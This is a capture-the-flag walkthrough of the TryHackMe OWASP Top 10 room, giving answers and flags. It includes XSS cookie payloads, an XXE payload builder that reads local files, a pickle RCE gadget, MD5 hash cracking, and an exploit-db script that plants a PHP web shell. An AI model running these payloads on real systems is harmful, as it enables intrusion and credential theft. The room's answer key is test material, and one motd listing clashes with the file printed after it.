Information
Room
Name: OWASP Top 10
Profile: tryhackme.com
Difficulty: Easy
Description: Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.
OWASP Top 10
Write-up
Overview
Install the tools used in this write-up on BlackArch Linux:
$ sudo pacman -S exploitdb dbeaver python
Command Injection Practical
What strange text file is in the website root directory?
Answer: drpepper.txt
Issue the ls command to list files.
css drpepper.txt evilshell.php index.php js
How many non-root/non-service/non-daemon users are there?
Answer: 0
Issue the cat /etc/passwd command. There are no non-root/non-service/non-daemon users: no account has a regular-user UID (1000 or above, other than nobody at 65534) together with an interactive shell.
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
What user is this app running as?
Answer: www-data
Issue the id command.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
What is the user's shell set as?
Answer: /usr/sbin/nologin
echo $SHELL returns nothing (commands run through the web shell do not get a login environment), so read the shell field straight from /etc/passwd instead: cat /etc/passwd | grep www-data | cut -d ':' -f 7.
/usr/sbin/nologin
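Rather than counting by eye, the two checks above (which accounts are real users, and which shell a given account has) can be scripted. The following is an added example and not part of the original write-up; the passwd excerpt is constructed in the same shape as the output above, with a hypothetical falcon line added so the positive case is exercised as well:

```python
# Added example: answer "how many human users?" and "what shell does www-data
# have?" by parsing /etc/passwd instead of reading it by hand.

# Constructed excerpt in the shape of the target's /etc/passwd; the 'falcon'
# line is hypothetical and only there so a human account is found.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
falcon:x:1000:1000:falcon:/home/falcon:/bin/bash
"""

# Shells that deny an interactive login on Debian/Ubuntu systems.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_passwd(text):
    """Yield (name, uid, shell) for every well-formed passwd line."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # tolerate a truncated or garbled line instead of crashing
        yield fields[0], int(fields[2]), fields[6]


def human_users(text, min_uid=1000, nobody_uid=65534):
    """Accounts with a regular-user UID and an interactive shell.

    Debian/Ubuntu allocate UIDs >= 1000 to people; 65534 is 'nobody'.
    """
    return [
        name
        for name, uid, shell in parse_passwd(text)
        if uid >= min_uid and uid != nobody_uid and shell not in NON_LOGIN_SHELLS
    ]


def shell_of(text, user):
    """Return the login shell of `user`, or None if the account is absent."""
    for name, _uid, shell in parse_passwd(text):
        if name == user:
            return shell
    return None


if __name__ == "__main__":
    print(human_users(SAMPLE_PASSWD))          # ['falcon']
    print(shell_of(SAMPLE_PASSWD, "www-data"))  # /usr/sbin/nologin
```

On the real target the excerpt would be replaced by the output of cat /etc/passwd; with the listing shown above, human_users returns an empty list, which is the answer 0.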
What version of Ubuntu is running?
Answer: 18.04.4
Run cat /etc/os-release.
VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
Print out the MOTD. What favorite beverage is shown?
Answer: Dr pepper
$ ls -1 /etc/update-motd.d/
10-help-text
50-landscape-sysinfo
50-motd-news
80-esm
80-livepatch
90-updates-available
91-release-upgrade
92-unattended-upgrades
95-hwe-eol
97-overlayroot
98-fsck-at-reboot
98-reboot-required

$ cat /etc/update-motd.d/00-header
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
    # Fall back to using the very slow lsb_release utility
    DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"

DR PEPPER MAKES THE WORLD TASTE BETTER!
Broken Authentication Practical
What is the flag that you found in darren's account?
Register as darren and log in.
Answer: fe86079416a21a3c99937fea8874b667
What is the flag that you found in arthur's account?
Register as arthur and log in.
Answer: d9ac0f7db4fda460ac3edeb75d75e16e
Sensitive Data Exposure (Challenge)
Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.
What is the name of the mentioned directory?
Answer: /assets
Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
Answer: webapp.db
Use the supporting material to access the sensitive data. What is the password hash of the admin user?
Answer: 6eea9b7ef19179a06954edd0f6c05ceb
Open the database with DBeaver and read the password column of the admin row.
Crack the hash. What is the admin's plaintext password?
Answer: qwertyuiop
The hash is 32 hex characters, so treat it as MD5 and look it up on CrackStation.
Login as the admin. What is the flag?
Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
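The same extract-and-crack steps, reproduced offline in Python as an added example that is not part of the write-up. The SQLite database and its users table are constructed here with an assumed schema, only the admin hash is the value shown above, and the wordlist is a tiny stand-in for a real one such as rockyou.txt:

```python
import hashlib
import sqlite3

# Added example: pull the admin hash out of a SQLite users table and crack it
# by brute force against a wordlist.

ADMIN_HASH = "6eea9b7ef19179a06954edd0f6c05ceb"  # value shown in the write-up

# Constructed wordlist; a real run would stream rockyou.txt or similar.
WORDLIST = ["password", "123456", "letmein", "qwertyuiop", "admin"]


def build_sample_db():
    """Construct an in-memory stand-in for webapp.db (schema is assumed)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (userID TEXT, username TEXT, password TEXT, admin INTEGER)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            ("1", "admin", ADMIN_HASH, 1),
            ("2", "bob", hashlib.md5(b"hunter2").hexdigest(), 0),  # constructed row
        ],
    )
    return con


def admin_hash(con):
    """Equivalent of browsing the users table in DBeaver and copying the hash."""
    row = con.execute(
        "SELECT password FROM users WHERE username = ?", ("admin",)
    ).fetchone()
    return row[0] if row else None


def crack_md5(target, words):
    """Return the first word whose unsalted MD5 matches `target`, else None."""
    target = target.lower()
    if len(target) != 32:
        raise ValueError("expected a 32-hex-char MD5 digest")
    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


if __name__ == "__main__":
    digest = admin_hash(build_sample_db())
    print(digest, "->", crack_md5(digest, WORDLIST))  # ... -> qwertyuiop
```

Unsalted MD5 is why a lookup service works at all: every user with the same password has the same hash, so one precomputed table covers them all.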
XML External Entity - eXtensible Markup Language
Full form of XML
Answer: eXtensible Markup Language
Is it compulsory to have XML prolog in XML documents?
Answer: no
The prolog (the <?xml ...?> declaration) is optional in XML 1.0; when it is present it must be the very first thing in the document.
Can we validate XML documents against a schema?
Answer: yes
How can we specify XML version and encoding in XML document?
Answer: XML Prolog
XML External Entity - DTD
How do you define a new ELEMENT?
Answer: !ELEMENT
How do you define a ROOT element?
Answer: !DOCTYPE
How do you define a new ENTITY?
Answer: !ENTITY
XML External Entity - Exploiting
What is the name of the user in /etc/passwd?
Answer: falcon
Where is falcon's SSH key located?
Answer: /home/falcon/.ssh/id_rsa
What are the first 18 characters of falcon's private key?
Answer: MIIEogIBAAKCAQEA7b
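The file-disclosure XXE used for the three questions above, as an added example that is not part of the write-up: the payload declares an external entity pointing at a local file, and a parser that resolves external general entities returns the file's contents as text. Python's xml.sax is used on both sides, with external entity resolution switched on to model the vulnerable server and left at its default (off since Python 3.7.1) to model the hardened one. The passwd content is constructed; only the falcon user name is taken from the room:

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Added example: XXE file disclosure against a resolving parser versus the
# same payload against one that refuses external entities.

# Constructed stand-in for the target's /etc/passwd (only 'falcon' is from the room).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "falcon:x:1000:1000::/home/falcon:/bin/bash\n"
)


def xxe_payload(path, root="data"):
    """Classic XXE: an external general entity whose SYSTEM id is a local file."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [<!ENTITY xxe SYSTEM "{path}">]>\n'
        f"<{root}>&xxe;</{root}>"
    ).encode()


class TextCollector(ContentHandler):
    """Collect character data, which is where the entity's expansion lands."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def extract_text(xml_bytes, allow_external_entities):
    """Parse `xml_bytes`; `allow_external_entities=True` models a vulnerable server."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def demo():
    """Write the sample file, fire the payload at both parser configurations."""
    with tempfile.NamedTemporaryFile("w", delete=False) as f:
        f.write(SAMPLE_PASSWD)
        path = f.name
    try:
        payload = xxe_payload(path)
        return {
            "vulnerable": extract_text(payload, allow_external_entities=True),
            "hardened": extract_text(payload, allow_external_entities=False),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for mode, text in demo().items():
        print(f"{mode}: {text!r}")
```

The same payload with /home/falcon/.ssh/id_rsa as the SYSTEM id is what yields the private key; binary or markup-heavy files need a CDATA or PHP-filter wrapping that this example does not cover.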
Broken Access Control (IDOR Challenge)
Look at other users notes. What is the flag?
Change the note parameter in the URL to another user's note ID: http://10.10.125.211/note.php?note=0
Answer: flag{fivefourthree}
Security Misconfiguration
Hack into the webapp, and find the flag!
Answer: thm{4b9513968fd564a87b28aa1f9d672e17}
Cross-site Scripting
Go to http://10.10.93.135/reflected and craft a reflected XSS payload that will cause a popup saying "Hello".
Answer: ThereIsMoreToXSSThanYouThink
<script>alert("Hello")</script>
On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.
<script>alert(window.location.hostname)</script>
Answer: ReflectiveXss4TheWin
Now navigate to http://10.10.93.135/stored and make an account.
Then add a comment and see if you can insert some of your own HTML.
<b>noraj is bold</b>
Answer: HTML_T4gs
On the same page, create an alert popup box to appear on the page with your document cookies.
<script>alert(document.cookie)</script>
Answer: W3LL_D0N3_LVL2s
Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.
<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>
Answer: websites_can_be_easily_defaced_with_xss
Insecure Deserialization
Who developed the Tomcat application?
Answer: The Apache Software Foundation
What type of attack that crashes services can be performed with insecure deserialization?
Answer: denial of service
Insecure Deserialization - Objects
Select the correct term for the following statement:
Answer: A Behaviour
Insecure Deserialization - Deserialization
What is the name of the base-2 formatting that data is sent across a network as?
Answer: binary
Insecure Deserialization - Cookies
If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?
Answer: webapp.com/login
What is the acronym for the web technology that Secure cookies work over?
Answer: HTTPS
Insecure Deserialization - Cookies Practical
1st flag (cookie value)
Answer: THM{good_old_base64_huh}
$ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d
}q(X sessionIdqX c7dc44838e0847b1b45544948a92d194qX
encodedflagqXTHM{good_old_base64_huh}qu.
The non-printable bytes around the strings are pickle opcodes: the decoded value starts with 0x80 0x03, the header of a Python pickle (protocol 3), so the cookie is a serialised Python dictionary, not just base64-encoded text.
2nd flag (admin dashboard)
Answer: THM{heres_the_admin_flag}
Insecure Deserialization - Remote Code Execution
flag.txt
Answer: 4a69a7ff9fd68
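Both the cookie section and the remote code execution section come down to the same thing: the application base64-decodes the cookie and hands it to pickle.loads, so whoever controls the cookie controls what gets executed on load. The following added example (not from the write-up) decodes the cookie shown above, builds a malicious replacement whose __reduce__ hook makes the unpickler call an attacker-chosen function, and shows a restricted unpickler that refuses any such payload. eval("6*7") is used as a deliberately harmless stand-in for the os.system call a real payload would carry:

```python
import base64
import io
import pickle

# Added example: why pickle.loads on a client-controlled cookie is RCE.

# Cookie value copied from the write-up's base64 line.
COOKIE = (
    "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRx"
    "AlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg=="
)


def decode_cookie(value):
    """What the vulnerable application does: trust and unpickle client data."""
    raw = base64.b64decode(value)
    if raw[:2] != b"\x80\x03":
        raise ValueError("not a protocol-3 pickle")
    return pickle.loads(raw)


class Gadget:
    """On unpickling, pickle calls whatever __reduce__ names, with those args.

    eval("6*7") is a harmless stand-in; a real payload returns
    (os.system, ("<reverse shell command>",)).
    """

    def __reduce__(self):
        return (eval, ("6*7",))


def malicious_cookie():
    """Build the replacement cookie an attacker would send."""
    return base64.b64encode(pickle.dumps(Gadget(), protocol=3)).decode()


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve any global, so no callable can be smuggled in.

    Plain dicts/strings/ints never need find_class, so the legitimate
    session cookie still loads.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_decode(value):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(value))).load()


def loads_safely(value):
    """True if the restricted unpickler accepts the cookie, False if it rejects it."""
    try:
        safe_decode(value)
        return True
    except pickle.UnpicklingError:
        return False


if __name__ == "__main__":
    print(decode_cookie(COOKIE))                 # the session dict with the flag
    print(decode_cookie(malicious_cookie()))     # 42: attacker code ran on load
    print(loads_safely(COOKIE), loads_safely(malicious_cookie()))  # True False
```

The restricted unpickler is a containment measure, not a fix: the real remedy is to stop serialising session state into a client-held cookie with pickle at all and use a signed, data-only format such as JSON with an HMAC, as the room's own advice implies.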
Components With Known Vulnerabilities - Lab
How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)?
Answer: 1611
$ searchsploit CSE bookstore
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     | Path
------------------------------------------------------------------- ---------------------------------
CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting     | php/webapps/48973.txt
CSE Bookstore 1.0 - Authentication Bypass                          | php/webapps/48960.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ searchsploit online book store
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     | Path
------------------------------------------------------------------- ---------------------------------
GotoCode Online Bookstore - Multiple Vulnerabilities               | asp/webapps/17921.txt
Online Book Store 1.0 - 'bookisbn' SQL Injection                   | php/webapps/47922.txt
Online Book Store 1.0 - 'id' SQL Injection                         | php/webapps/48775.txt
Online Book Store 1.0 - Arbitrary File Upload                      | php/webapps/47928.txt
Online Book Store 1.0 - Unauthenticated Remote Code Execution      | php/webapps/47887.py
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ searchsploit -p 47887
  Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47887
     Path: /usr/share/exploitdb/exploits/php/webapps/47887.py
File Type: ASCII text, with CRLF line terminators

$ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php
> Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ wc -c /etc/passwd
1611 /etc/passwd
Insufficient Logging and Monitoring
What IP address is the attacker using?
Answer: 49.99.13.16
What kind of attack is being carried out?
Answer: brute force